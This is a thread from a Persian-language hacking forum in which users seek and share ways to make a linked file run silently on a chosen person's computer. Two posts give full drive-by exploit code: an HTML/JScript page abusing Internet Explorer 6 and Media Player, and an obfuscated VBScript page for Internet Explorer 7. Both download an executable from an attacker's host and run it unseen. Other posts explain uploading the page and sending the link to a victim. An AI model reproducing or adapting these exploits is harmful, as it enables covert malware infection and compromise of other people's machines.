اطلاعیه

Collapse
No announcement yet.

بدست آوردن شماره تلفن یک نفر

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • #16
    نوشته اصلی توسط passw0rd68 نمایش پست ها
    راهی هست که اگه لینک فایل رو به اون یه نفر بدم بدونه اینکه گزینه ی Save یا run رو بیاره

    تا لینک رو باز کزد خودش ران شه رو سیستم دیگه گزینه ی save رو نیاره

    فرستادن و اجراي يك فايل از طريق سايت بصورت مخفي در كامپيوتر هدف!
    با روشي كه توضيخ خواهم داد شما مي توانيد از طريق يك سايت فايلي را در كامپيوتر هدف خود دانلود و سپس اجرا كنيد! راه نفوذ اين روش از طريق سر ريز شدن اينترنت اكسپلورر 6 و مديا پلير هست.



    1. يك فايل با پسوند HTML تشكيل دهيد و كد زير را در آن قرار دهيد:

    CODE
    کد PHP:
    <textarea id="code" style="display:none;">

    var 
    = new ActiveXObject("Microsoft.XMLH TTP"); 
    x.Open("GET""http://YourHost.com/YourEvilFile.exe",0); 
    x.Send(); 

    var 
    = new ActiveXObject("ADODB.Stream");
    s.Mode 3;
    s.Type 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href "mms://";

    </
    textarea>
    Wait a couple of seconds..

    <****** 
    language="**********">

    function 
    preparecode(code) {
    result '';
    lines code.split(/\r\n/);
    for (
    i=0;i<lines.length;i++) {

    line lines;
    line line.replace(/^\s+/,"");
    line line.replace(/\s+$/,"");
    line line.replace(/'/g,"\\'");
    line = line.replace(/[\\]/g,"
    \\\\");
    line = line.replace(/[/]/g,"
    %2f");

    if (line != '') {
    result += line +'\\r\\n';
    }
    }
    return result;
    }

    function doit() {
    mycode = preparecode(document.all.c ode.value);
    myURL = "
    file:**********:eval('" + mycode + "')";
    window.open(myURL,"
    _media") 
    }


    window.open("
    error.jsp","_media");

    setTimeout("
    doit()", 5000);


    </******> 
    بجاي قسمت http://YourHost.com/YourEvilFile.exe آدرس فايلي را بنويسيد كه مي خواهيد در كامپيوتر هدف اجرا شود.

    اگر هدف شما مديا پلير را در شاخه يا داريوي غير از C:\\Program Files\\Windows Media Player\\wmplayer.exe نصب كرده است اين قسمت را نيز تغيير دهيد.



    2. يك فايل ديگر با نام error.jsp تشكيل دهيد و داخل آن هر كد html كه مي خواهيد قرار دهيد. چون هدف شما در هنگام دانلود و اجرا شدن فايل صفحه درون فايل error.jsp را مي بيند.


    3. حالا فايل html و error.jsp را در يك شاخه روي يك فضا رايگاني كه از يك سرور مثل http://www.angelfire.com گرفته ايد آپ لود كنيد.


    4. از فايل اجرايي مديا پلير خود wmplayer.exe يك كپي تهيه كنيد چون احتمال دارد خراب شود


    5. وارد صفحه html كه ساخته بوديد از طريق اينترنت اكسپلورر شويد. مثلا http://www.angelfire.com/youaccoundname/index.html


    6. فايل بدون هيچ اخطاري دانلود شده و بجاي فايل اجرايي مديا پلير ميشيند و سپس اجرا مي شود.


    البته من امتحانش نکردم
    (◕‿◕)

    Comment


    • #17
      خیلی قدیمی شده این باگ و فیکس شده همه جا!
      عمر این روش هم سن من هست فکر کنم ! lol
      W)(lf بیچاره شاگردی که از استادش بهتر باشه!!
      www.rashtmarket.ir

      www.rashtonline.ir
      http://hashem-wolf.ir
      ديسك آموزش لينوكس

      Comment


      • #18
        نوشته اصلی توسط hashem_wolf نمایش پست ها
        خیلی قدیمی شده این باگ و فیکس شده همه جا!
        عمر این روش هم سن من هست فکر کنم ! lol
        خوب شما روش جدیدشو بگید ممنون میشم

        Qurd_Az جان ممنونم از شما
        کنکور هکینگ کی بلده ؟؟؟؟

        امید وارم بتونم بااین که رشتم کامپیوتره امکان قبولیم خیلی زیاده

        Comment


        • #19
          نوشته اصلی توسط passw0rd68 نمایش پست ها
          خوب شما روش جدیدشو بگید ممنون میشم

          Qurd_Az جان ممنونم از شما
          بدون شرح:
          کد:
          <html>
          <head>
          <title>IE7</title>
          </head>
          <body>
          <****** type="text/vb******">
          on error resume next
          Set df = document.createElement("object")
          df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
          str="Microsoft"&"."&"XMLHTTP"
          Set x = df.CreateObject(str,"")
          var1="Ad"
          var2="od"
          var3="b."
          var4="St"
          var5="re"
          var6="am"
          str1=var1&var2&var3&var4&var5&var6
          
          str5=str1
          set S = df.createobject(str5,"")
          for count = 0 to 4
          S.type = 1
          lnk="site.com/file.exe"
          x.Open "G"&"E"&"T",lnk,0
          x.Send
          set F = df.createobject("******"&"ing.FileSys"&"temObject" ,"")
          if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:\temp" else if count = 3 then tmp = "d:\windows\temp" else if count = 4 then tmp = "d:\" end if
          fname1= F.BuildPath(tmp,"\svacm.exe")
          S.open
          S.write x.responseBody
          S.savetofile fname1,2
          S.close
          if err.number = 0 then
          set Q = df.createobject("Shell.Application","")
          Q.ShellExecute fname1,"INSTALL","","open",0
          exit for
          else
          Err.Clear
          End if
          next
          </******>
          </body>
          </html>

          Comment


          • #20
            نوشته اصلی توسط hamedany نمایش پست ها
            بدون شرح:
            کد:
            <html>
            <head>
            <title>IE7</title>
            </head>
            <body>
            <****** type="text/vb******">
            on error resume next
            Set df = document.createElement("object")
            df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
            str="Microsoft"&"."&"XMLHTTP"
            Set x = df.CreateObject(str,"")
            var1="Ad"
            var2="od"
            var3="b."
            var4="St"
            var5="re"
            var6="am"
            str1=var1&var2&var3&var4&var5&var6
            
            str5=str1
            set S = df.createobject(str5,"")
            for count = 0 to 4
            S.type = 1
            lnk="site.com/file.exe"
            x.Open "G"&"E"&"T",lnk,0
            x.Send
            set F = df.createobject("******"&"ing.FileSys"&"temObject" ,"")
            if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:\temp" else if count = 3 then tmp = "d:\windows\temp" else if count = 4 then tmp = "d:\" end if
            fname1= F.BuildPath(tmp,"\svacm.exe")
            S.open
            S.write x.responseBody
            S.savetofile fname1,2
            S.close
            if err.number = 0 then
            set Q = df.createobject("Shell.Application","")
            Q.ShellExecute fname1,"INSTALL","","open",0
            exit for
            else
            Err.Clear
            End if
            next
            </******>
            </body>
            </html>
            اگر امكان داره يك توضيحي بديد تا ما بيسوادها هم حالميون بشه

            Comment


            • #21
              نوشته اصلی توسط y_nima2000 نمایش پست ها
              اگر امكان داره يك توضيحي بديد تا ما بيسوادها هم حالميون بشه
              site.com/file.exe

              آدرس فایل . بعدش هم به صورت اچ تی ام ال سیو کن و آپلود و لینک را به یارو . همین
              (◕‿◕)

              Comment


              • #22
                نوشته اصلی توسط Qurd_Az نمایش پست ها
                site.com/file.exe

                آدرس فایل . بعدش هم به صورت اچ تی ام ال سیو کن و آپلود و لینک را به یارو . همین
                اينو مي دونم منظورم اينه كه بر روي اينترنت 7 هم جواب ميده يا نه

                Comment


                • #23
                  نوشته اصلی توسط y_nima2000 نمایش پست ها
                  اينو مي دونم منظورم اينه كه بر روي اينترنت 7 هم جواب ميده يا نه
                  آره رو اونم کار میکنه:
                  <title>IE7</title>
                  پیوست:
                  یه چند وقتی هست که این اکسپلویت نوشته شده ولی هنوز گزارش نشده

                  Comment


                  • #24
                    این اکسپلویت روی Ie 7 پچ نشده کار میکنه اگه کار نکرد بدونید طرف پچش کرده

                    Comment


                    • #25
                      من که رو Ie7 تست کردم جواب نداد

                      Comment

                      Working...
                      X